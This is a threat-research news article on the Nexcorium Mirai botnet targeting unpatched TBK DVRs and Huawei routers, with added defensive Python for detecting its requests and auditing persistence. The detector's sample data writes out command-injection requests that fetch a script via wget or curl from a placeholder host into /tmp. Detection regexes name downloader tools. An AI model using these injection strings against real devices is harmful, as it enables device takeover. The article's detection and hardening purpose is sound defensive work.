Nexcorium Malware Variant Emerges, Targeting Unpatched IoT Devices
A newly identified Mirai variant, dubbed Nexcorium, is actively exploiting a vulnerability in unpatched Internet of Things (IoT) devices. Recent threat research from FortiGuard Labs reports that attackers are using a critical flaw in TBK DVR systems to recruit devices into a botnet used for distributed denial-of-service (DDoS) attacks.
The campaign's initial access vector is CVE-2024-3721, an operating system command injection flaw affecting the TBK DVR-4104 and DVR-4216 models. Exploiting it lets a remote attacker run commands on the device, which the attackers use to drop a downloader script that stages the rest of the intrusion.
FortiGuard Labs' analysis also noted a distinctive marker in the attack traffic: a custom HTTP header reading “X-Hacked-By: Nexus Team – Exploited By Erratic.” That header ties the activity to an emerging threat actor calling itself the Nexus Team.
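The header and the command-injection-plus-downloader pattern are what a sensor in front of a DVR can key on. The following is an added example for this article, not FortiGuard Labs' or the vendor's code: it classifies raw HTTP requests as a honeypot or IDS would capture them. The sample requests, the placeholder endpoint /example.cgi and the TEST-NET addresses are constructed for the example; the shell-metacharacter and downloader heuristics are my own, not published indicators.

```python
"""Flag HTTP requests that look like the DVR command-injection campaign
described above. Samples are constructed, not real captures; /example.cgi
is a placeholder endpoint, not the vulnerable TBK path."""
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Header string the article reports in the attack traffic. Prefix match only,
# so whichever dash follows "Nexus Team" still hits.
NEXUS_HEADER = re.compile(r"^x-hacked-by:\s*nexus team", re.I | re.M)

# My heuristics: a shell separator or substitution in the decoded request,
# combined with a downloader writing to volatile or world-writable storage,
# is the usual IoT "fetch and run" chain.
SHELL_META = re.compile(r"(;|\|\||\||&&|`|\$\()")
DOWNLOADER = re.compile(
    r"\b(wget|curl|tftp|ftpget|busybox)\b.*(/tmp/|/var/tmp/|/dev/shm/|/var/run/)",
    re.I,
)


def parse_request(raw: str):
    """Split a raw HTTP request into (request line, header block, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    return lines[0], "\r\n".join(lines[1:]), body


def classify_request(raw: str) -> Dict[str, object]:
    request_line, headers, body = parse_request(raw)
    indicators: List[str] = []
    if NEXUS_HEADER.search(headers):
        indicators.append("nexus-team-header")
    # Decode once so %3B, %60 and '+' variants look the way the shell sees them.
    decoded = unquote_plus(request_line) + "\n" + unquote_plus(body)
    if SHELL_META.search(decoded) and DOWNLOADER.search(decoded):
        indicators.append("cmd-injection-downloader")
    return {"request": request_line, "indicators": indicators,
            "suspicious": bool(indicators)}


def scan(requests: List[str]) -> List[Dict[str, object]]:
    """Return only the suspicious classifications from a batch of requests."""
    return [r for r in (classify_request(x) for x in requests) if r["suspicious"]]


# Constructed samples: one benign page fetch, one injection carrying the
# campaign header, one URL-encoded injection in a POST body without it.
SAMPLES = [
    "GET /index.html HTTP/1.1\r\nHost: dvr.local\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET /example.cgi?param=;wget%20http://203.0.113.10/d.sh%20-O%20/tmp/d.sh HTTP/1.1\r\n"
    "Host: 198.51.100.7\r\nX-Hacked-By: Nexus Team - Exploited By Erratic\r\n\r\n",
    "POST /example.cgi HTTP/1.1\r\nHost: 198.51.100.7\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "param=%60curl+http%3A%2F%2F203.0.113.10%2Fd.sh+-o+%2Ftmp%2Fd.sh%60",
]

if __name__ == "__main__":
    for hit in scan(SAMPLES):
        print(hit["request"], hit["indicators"])
```

The header is the high-confidence indicator but the cheapest for the actor to change; the decoded separator-plus-downloader check is what keeps catching the same exploit chain after the header is dropped or renamed, at the cost of needing a quick look at the few legitimate requests that carry pipes or semicolons.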
Malware Behavior and Rapid Spread
Once the downloader script runs, it retrieves the Nexcorium payload. The malware is built for several Linux architectures, including ARM, MIPS and x86-64, so a single campaign can infect a wide range of embedded devices. On successful execution it prints the message “nexuscorp has taken control.”
Like earlier Mirai botnets, Nexcorium spreads aggressively. After infecting a host it scans the internet for further targets. It carries an exploit for Huawei HG532 routers (CVE-2017-17215) and a hard-coded list of common weak credentials, such as “admin,” “12345,” and “guest,” which it uses to brute-force Telnet access on other exposed devices.
Persistence Mechanisms
To keep its foothold, Nexcorium layers several persistence mechanisms, so removing any one of them is not enough:
- Init configuration: it alters /etc/inittab so the malicious process is respawned if it crashes or is killed.
- Startup scripts: it modifies local startup files so the malware runs at every boot.
- Systemd services: it creates a hidden background service that starts automatically without user interaction.
- Cron jobs: it schedules recurring jobs that relaunch the malware.
Once these are in place, Nexcorium deletes its original installation files to hide from analysts and antivirus tools. That deletion is itself a triage signal: a process still running from an unlinked binary shows up on Linux with /proc/<pid>/exe pointing at the original path followed by “(deleted)”.
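The four persistence locations above are exactly where a responder should look on a suspect device, and the self-deleting installer gives one more check. The following audit script is an added example for this article, not FortiGuard Labs' or the vendor's tooling. The file contents are constructed: the names “bot” and “.x” are placeholders, not the malware's real paths, and the "suspicious path" heuristic (execution from /tmp, /var/tmp, /dev/shm or a hidden dot-path) is my own choice.

```python
"""Audit the persistence spots the article lists (inittab, startup scripts,
systemd units, cron) and list processes whose binary was deleted from disk.
SAMPLE_FILES is constructed; "bot" and ".x" are placeholder names."""
import os
import re
from typing import Dict, List, Tuple

PERSISTENCE_FILES = ["/etc/inittab", "/etc/rc.local", "/etc/init.d/rcS", "/etc/crontab"]
PERSISTENCE_DIRS = ["/etc/systemd/system", "/etc/cron.d", "/var/spool/cron/crontabs"]

# Execution from volatile or world-writable storage, or from a hidden
# ("dot") path, is the classic IoT-bot persistence tell. My heuristic.
SUSPECT_PATH = re.compile(r"(/tmp/|/var/tmp/|/dev/shm/|/\.[^/\s]+)")

Finding = Tuple[str, int, str]  # (file, line number, or 0 for the file itself, text)


def audit_persistence(files: Dict[str, str]) -> List[Finding]:
    """Scan {path: contents} and report hidden files and suspicious entries."""
    findings: List[Finding] = []
    for path, content in files.items():
        if SUSPECT_PATH.search(path):
            findings.append((path, 0, "hidden file in a persistence directory"))
        for lineno, line in enumerate(content.splitlines(), 1):
            text = line.strip()
            if not text or text.startswith("#"):
                continue
            if SUSPECT_PATH.search(text):
                findings.append((path, lineno, text))
    return findings


def collect_live() -> Dict[str, str]:
    """Read the real locations on this host; absent or unreadable ones are skipped."""
    candidates = list(PERSISTENCE_FILES)
    for d in PERSISTENCE_DIRS:
        if os.path.isdir(d):
            candidates += [os.path.join(d, f) for f in os.listdir(d)]
    files: Dict[str, str] = {}
    for p in candidates:
        try:
            with open(p, encoding="utf-8", errors="replace") as fh:
                files[p] = fh.read()
        except OSError:
            continue
    return files


def deleted_executables() -> List[Tuple[int, str]]:
    """Running processes whose binary is gone: Linux reports the exe link as
    '<path> (deleted)'. Returns an empty list where /proc is unavailable."""
    out: List[Tuple[int, str]] = []
    if not os.path.isdir("/proc"):
        return out
    for pid in os.listdir("/proc"):
        if not pid.isdigit():
            continue
        try:
            target = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue
        if target.endswith(" (deleted)"):
            out.append((int(pid), target))
    return out


# Constructed contents mimicking the four mechanisms the article describes.
SAMPLE_FILES = {
    "/etc/inittab": "::sysinit:/etc/init.d/rcS\n::respawn:/sbin/getty -L ttyS0 115200 vt100\n::respawn:/tmp/.x/bot\n",
    "/etc/rc.local": "#!/bin/sh\n/usr/sbin/dropbear\n/dev/shm/.x/bot &\nexit 0\n",
    "/etc/systemd/system/.bot.service": "[Service]\nExecStart=/usr/bin/.bot\nRestart=always\n",
    "/etc/crontab": "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n*/5 * * * * root /var/tmp/.x/bot\n",
}

if __name__ == "__main__":
    for path, lineno, text in audit_persistence(SAMPLE_FILES):
        print(f"{path}:{lineno}: {text}")
    for pid, exe in deleted_executables():
        print(f"pid {pid} running from deleted binary {exe}")
```

Run `audit_persistence(collect_live())` on the device itself (via a serial console or a known-good shell, not the possibly trojaned Telnet service) to check the real files; the sample dict exists only so the logic can be exercised offline.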
Objectives and Attack Methods
The botnet's purpose is DDoS. The malware connects to a remote command-and-control server that issues targeting instructions, and FortiGuard Labs reports that it supports several attack methods, including UDP floods, TCP SYN floods and SMTP floods, letting the Nexus Team hit a range of networks, applications and web servers.
Mitigation Strategies
As IoT botnets like Nexcorium proliferate, organizations and network administrators should take proactive defensive measures:
- Firmware updates: apply the latest vendor patches to all DVRs, routers and other IoT hardware, and retire devices the vendor no longer patches.
- Stronger passwords: replace default device credentials with strong, unique passwords to defeat dictionary brute-forcing.
- Network access restrictions: disable Telnet, or at least block it from the internet, and keep the management interfaces of DVRs and routers reachable only from a management network or VPN rather than the public internet.
- Traffic monitoring: watch for unusual outbound connections from IoT devices, in particular one device opening connections to many distinct internet hosts on Telnet or other service ports, which is the signature of the automated scanning this worm performs.
With Nexcorium active, prompt action matters more than alarm: patch the affected DVRs and routers, remove default credentials, keep Telnet and management interfaces off the internet, and watch for the scanning and persistence signs described above. Organizations that do this are not easy targets for Nexcorium or for the next Mirai variant that follows it.
